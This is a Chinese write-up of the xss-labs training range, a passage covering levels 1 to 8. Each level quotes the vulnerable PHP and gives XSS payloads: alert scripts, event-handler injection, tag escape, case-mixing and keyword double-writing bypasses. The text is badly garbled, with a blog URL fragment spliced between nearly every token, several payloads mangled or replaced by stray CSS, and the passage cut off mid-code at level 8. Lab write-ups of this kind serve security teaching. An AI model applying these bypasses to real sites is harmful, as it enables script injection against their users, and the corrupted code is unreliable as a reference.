文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

xss-labs靶场全通关

2023-09-07 17:53

关注

xss-labs靶场全通关


前言

所用的xss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs 在这里关于 如何搭建靶场的就不再赘述了,可以在本地用phpstudy来搭建的。建议使用火狐浏 览器,访问http://ip/xss-labs
在这里插入图片描述

点击图片开始你的xss之旅吧!


level 1

在这里插入图片描述

源码:

body>https://blog.csdn.net/m0_52051132/article/details/h1 align=https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/欢迎来到level1/https://blog.csdn.net/m0_52051132/article/details/h1>https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ $_GET[https://blog.csdn.net/m0_52051132/article/details/"name"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "

欢迎用户"https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/$str.https://blog.csdn.net/m0_52051132/article/details/"

"https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/level1.https://blog.csdn.net/m0_52051132/article/details/png>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/phpecho "

payload的长度:"https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/strlenhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"

"https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/body>https://blog.csdn.net/m0_52051132/article/details/

分析:没有做任何过滤

 payload为:name=https://blog.csdn.net/m0_52051132/article/details/script>https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/script>https://blog.csdn.net/m0_52051132/article/details/

level 2

在这里插入图片描述

源码:

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ $_GET[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "

没有找到和"https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/htmlspecialcharshttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"相关的结果.

"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/'center>https://blog.csdn.net/m0_52051132/article/details/form action=https://blog.csdn.net/m0_52051132/article/details/level2.https://blog.csdn.net/m0_52051132/article/details/php method=https://blog.csdn.net/m0_52051132/article/details/GET>https://blog.csdn.net/m0_52051132/article/details/input name=https://blog.csdn.net/m0_52051132/article/details/keyword value=https://blog.csdn.net/m0_52051132/article/details/"'.$str.'"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/input type=https://blog.csdn.net/m0_52051132/article/details/submit name=https://blog.csdn.net/m0_52051132/article/details/submit value=https://blog.csdn.net/m0_52051132/article/details/"搜索"https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/form>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/';https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/level2.https://blog.csdn.net/m0_52051132/article/details/png>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/

分析:有两处输出,第一处在PHP代码块的echo中输出,第二处在表单input中输出,第 一处用htmlspeciachars()做了转义,第二处并没有做限制,让payload在第二处起效果就 好,有2种方法。
1.不逃逸input标签闭合前边的双引号加个事件触发xss即可:

移动下鼠标即可触发payload为:https://blog.csdn.net/m0_52051132/article/details/ " line-height: 160%; box-sizing: content-box;"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/ 点击输入框即可触发payload为:https://blog.csdn.net/m0_52051132/article/details/ " line-height: 160%; box-sizing: content-box;"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/ 击输入框即可触发payload为:https://blog.csdn.net/m0_52051132/article/details/ " οnfοcus="https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/

逃逸出input标签执行另外的标签触发xss即可:

img>https://blog.csdn.net/m0_52051132/article/details/标签payload为:">https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/!https://blog.csdn.net/m0_52051132/article/details/ >https://blog.csdn.net/m0_52051132/article/details/img>https://blog.csdn.net/m0_52051132/article/details/标签payload为:">:https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/">https://blog.csdn.net/m0_52051132/article/details/ //浏览器可能会 过滤这个https://blog.csdn.net/m0_52051132/article/details/a>https://blog.csdn.net/m0_52051132/article/details/标签payload为:">https://blog.csdn.net/m0_52051132/article/details/a >https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/a>https://blog.csdn.net/m0_52051132/article/details/a>https://blog.csdn.net/m0_52051132/article/details/标签payload为:https://blog.csdn.net/m0_52051132/article/details/a >https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/a>https://blog.csdn.net/m0_52051132/article/details/ // 移动鼠标至框内https://blog.csdn.net/m0_52051132/article/details/

level 3

在这里插入图片描述

源码:

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ $_GET[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "

没有找到和"https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/htmlspecialcharshttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"相关的结果.

"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/"center>https://blog.csdn.net/m0_52051132/article/details/form action=https://blog.csdn.net/m0_52051132/article/details/level3.https://blog.csdn.net/m0_52051132/article/details/php method=https://blog.csdn.net/m0_52051132/article/details/GET>https://blog.csdn.net/m0_52051132/article/details/input name=https://blog.csdn.net/m0_52051132/article/details/keyword value=https://blog.csdn.net/m0_52051132/article/details/'".htmlspecialchars($str)."'https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/input type=https://blog.csdn.net/m0_52051132/article/details/submit name=https://blog.csdn.net/m0_52051132/article/details/submit value=https://blog.csdn.net/m0_52051132/article/details/搜索 /https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/form>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/";https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/img src=https://blog.csdn.net/m0_52051132/article/details/level3.https://blog.csdn.net/m0_52051132/article/details/png>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/

分析:这次它将两个输出点都做了htmlspecialchars()转义,那既然做了转义那么双引号和 尖括号就没有效果了,但是单引号在这个函数中如果没做特殊的改动,默认是可以出效果 的,而且源码中的value是用单引号,看来是有意让使用单引号。

payload为:' οnmοuseοver='https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/ //其他payload省略https://blog.csdn.net/m0_52051132/article/details/

level 4

在这里插入图片描述

源码:

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ $_GET[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str2=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/">"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/""https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str3=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"<"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/""https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str2)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "

没有找到和"https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/htmlspecialcharshttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"相关的结果.

"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/'center>https://blog.csdn.net/m0_52051132/article/details/form action=https://blog.csdn.net/m0_52051132/article/details/level4.https://blog.csdn.net/m0_52051132/article/details/php method=https://blog.csdn.net/m0_52051132/article/details/GET>https://blog.csdn.net/m0_52051132/article/details/input name=https://blog.csdn.net/m0_52051132/article/details/keyword value=https://blog.csdn.net/m0_52051132/article/details/"'.$str3.'"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/input type=https://blog.csdn.net/m0_52051132/article/details/submit name=https://blog.csdn.net/m0_52051132/article/details/submit value=https://blog.csdn.net/m0_52051132/article/details/搜索 /https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/form>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/';https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

分析:这里的俩个输出点,一个被转义,另外一个将尖括号替换为空,但是这并不影响 啊,按照上两题的套路,虽然不能闭合标签,单照样可以在input标签里边出发xss的

payload为:" οnmοuseοver="https://blog.csdn.net/m0_52051132/article/details/alerthttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/ //鼠标点击输入框出发,其他payload 省略https://blog.csdn.net/m0_52051132/article/details/

level 5

在这里插入图片描述

源码:

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ strtolowerhttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$_GET[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str2=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/",https://blog.csdn.net/m0_52051132/article/details/",https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str3=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"on"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/"o_n"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str2)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "

没有找到和"https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/htmlspecialcharshttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"相关的结果.

"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/'center>https://blog.csdn.net/m0_52051132/article/details/form action=https://blog.csdn.net/m0_52051132/article/details/level5.https://blog.csdn.net/m0_52051132/article/details/php method=https://blog.csdn.net/m0_52051132/article/details/GET>https://blog.csdn.net/m0_52051132/article/details/input name=https://blog.csdn.net/m0_52051132/article/details/keyword value=https://blog.csdn.net/m0_52051132/article/details/"'.$str3.'"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/input type=https://blog.csdn.net/m0_52051132/article/details/submit name=https://blog.csdn.net/m0_52051132/article/details/submit value=https://blog.csdn.net/m0_52051132/article/details/搜索 /https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/form>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/';https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

分析:貌似还是和前几题差不多只是将

payload为:">https://blog.csdn.net/m0_52051132/article/details/a >https://blog.csdn.net/m0_52051132/article/details/xss/https://blog.csdn.net/m0_52051132/article/details/a>https://blog.csdn.net/m0_52051132/article/details/

level 6

在这里插入图片描述

源码:

?https://blog.csdn.net/m0_52051132/article/details/phpini_sethttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/ 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str =https://blog.csdn.net/m0_52051132/article/details/ $_GET[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str2=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/",https://blog.csdn.net/m0_52051132/article/details/",https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str3=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"on"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/"o_n"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str2)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str4=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"src"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/"sr_c"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str3)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str5=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"data"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/"da_ta"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str4)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str6=https://blog.csdn.net/m0_52051132/article/details/str_replacehttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/"href"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/"hr_ef"https://blog.csdn.net/m0_52051132/article/details/,https://blog.csdn.net/m0_52051132/article/details/$str5)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echo "

没有找到和"https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/htmlspecialcharshttps://blog.csdn.net/m0_52051132/article/details/(https://blog.csdn.net/m0_52051132/article/details/$str)https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/"相关的结果.

"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/'center>https://blog.csdn.net/m0_52051132/article/details/form action=https://blog.csdn.net/m0_52051132/article/details/level6.https://blog.csdn.net/m0_52051132/article/details/php method=https://blog.csdn.net/m0_52051132/article/details/GET>https://blog.csdn.net/m0_52051132/article/details/input name=https://blog.csdn.net/m0_52051132/article/details/keyword value=https://blog.csdn.net/m0_52051132/article/details/"'.$str6.'"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/input type=https://blog.csdn.net/m0_52051132/article/details/submit name=https://blog.csdn.net/m0_52051132/article/details/submit value=https://blog.csdn.net/m0_52051132/article/details/搜索 /https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/form>https://blog.csdn.net/m0_52051132/article/details//https://blog.csdn.net/m0_52051132/article/details/center>https://blog.csdn.net/m0_52051132/article/details/';https://blog.csdn.net/m0_52051132/article/details/?https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/

分析:代码中它还是进行了关键字过滤,但是没有了strtolow()函数,那么进行大小写绕过 即可:
1.在input标签中触发XSS:

payload为:" line-height: 160%; box-sizing: content-box;"https://blog.csdn.net/m0_52051132/article/details/>https://blog.csdn.net/m0_52051132/article/details/ 2https://blog.csdn.net/m0_52051132/article/details/.跳出input标签触 发XSS: payload为:">https://blog.csdn.net/m0_52051132/article/details/sCript>https://blog.csdn.net/m0_52051132/article/details/alert(https://blog.csdn.net/m0_52051132/article/details//xss/)https://blog.csdn.net/m0_52051132/article/details//sCript>https://blog.csdn.net/m0_52051132/article/details/ //等等..https://blog.csdn.net/m0_52051132/article/details/.

level 7

在这里插入图片描述

源码:

?phpini_set(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/, 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/strtolower(https://blog.csdn.net/m0_52051132/article/details/ $_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/str2https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"script"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$strhttps://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str3https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"on"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str2https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str4https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"src"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str3https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str5https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"data"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str4https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/str6https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"href"https://blog.csdn.net/m0_52051132/article/details/,""https://blog.csdn.net/m0_52051132/article/details/,$str5https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/echohttps://blog.csdn.net/m0_52051132/article/details/ "

没有找到和"https://blog.csdn.net/m0_52051132/article/details/.htmlspecialchars(https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/."相关的结果.

"https://blog.csdn.net/m0_52051132/article/details/
.https://blog.csdn.net/m0_52051132/article/details/'
.https://blog.csdn.net/m0_52051132/article/details/$str6https://blog.csdn.net/m0_52051132/article/details/.https://blog.csdn.net/m0_52051132/article/details/'">
'https://blog.csdn.net/m0_52051132/article/details/
;https://blog.csdn.net/m0_52051132/article/details/?>https://blog.csdn.net/m0_52051132/article/details/

分析:这道题出题人似乎把上边遇到的缺陷都补充了,但是程序有意的将特殊字符替换成 空字符,这样可以采用补充撮合的方法达到XSS攻击效果。
1.在input标签中触发:

 payload为:" oonnmouseover="https://blog.csdn.net/m0_52051132/article/details/alert(https://blog.csdn.net/m0_52051132/article/details//xss/)https://blog.csdn.net/m0_52051132/article/details/ //等等..https://blog.csdn.net/m0_52051132/article/details/.

跳出input标签触发:

   payload为:">https://blog.csdn.net/m0_52051132/article/details/scscriptript>https://blog.csdn.net/m0_52051132/article/details/alert(https://blog.csdn.net/m0_52051132/article/details//xss/)https://blog.csdn.net/m0_52051132/article/details//scscriptript>https://blog.csdn.net/m0_52051132/article/details/ //等等..https://blog.csdn.net/m0_52051132/article/details/.

level 8

在这里插入图片描述

源码:

?phpini_set(https://blog.csdn.net/m0_52051132/article/details/"display_errors"https://blog.csdn.net/m0_52051132/article/details/, 0https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$strhttps://blog.csdn.net/m0_52051132/article/details/ =https://blog.csdn.net/m0_52051132/article/details/ strtolower(https://blog.csdn.net/m0_52051132/article/details/$_GEThttps://blog.csdn.net/m0_52051132/article/details/[https://blog.csdn.net/m0_52051132/article/details/"keyword"https://blog.csdn.net/m0_52051132/article/details/]https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str2https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"script"https://blog.csdn.net/m0_52051132/article/details/,"scr_ipt"https://blog.csdn.net/m0_52051132/article/details/,$strhttps://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str3https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"on"https://blog.csdn.net/m0_52051132/article/details/,"o_n"https://blog.csdn.net/m0_52051132/article/details/,$str2https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str4https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"src"https://blog.csdn.net/m0_52051132/article/details/,"sr_c"https://blog.csdn.net/m0_52051132/article/details/,$str3https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str5https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"data"https://blog.csdn.net/m0_52051132/article/details/,"da_ta"https://blog.csdn.net/m0_52051132/article/details/,$str4https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/str6https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/"href"https://blog.csdn.net/m0_52051132/article/details/,"hr_ef"https://blog.csdn.net/m0_52051132/article/details/,$str5https://blog.csdn.net/m0_52051132/article/details/)https://blog.csdn.net/m0_52051132/article/details/;https://blog.csdn.net/m0_52051132/article/details/$str7https://blog.csdn.net/m0_52051132/article/details/=https://blog.csdn.net/m0_52051132/article/details/str_replace(https://blog.csdn.net/m0_52051132/article/details/'"'https://blog.csdn.net/m0_52051132/article/details/,'"'https://blog.csdn.net/m0_52051132/article/details/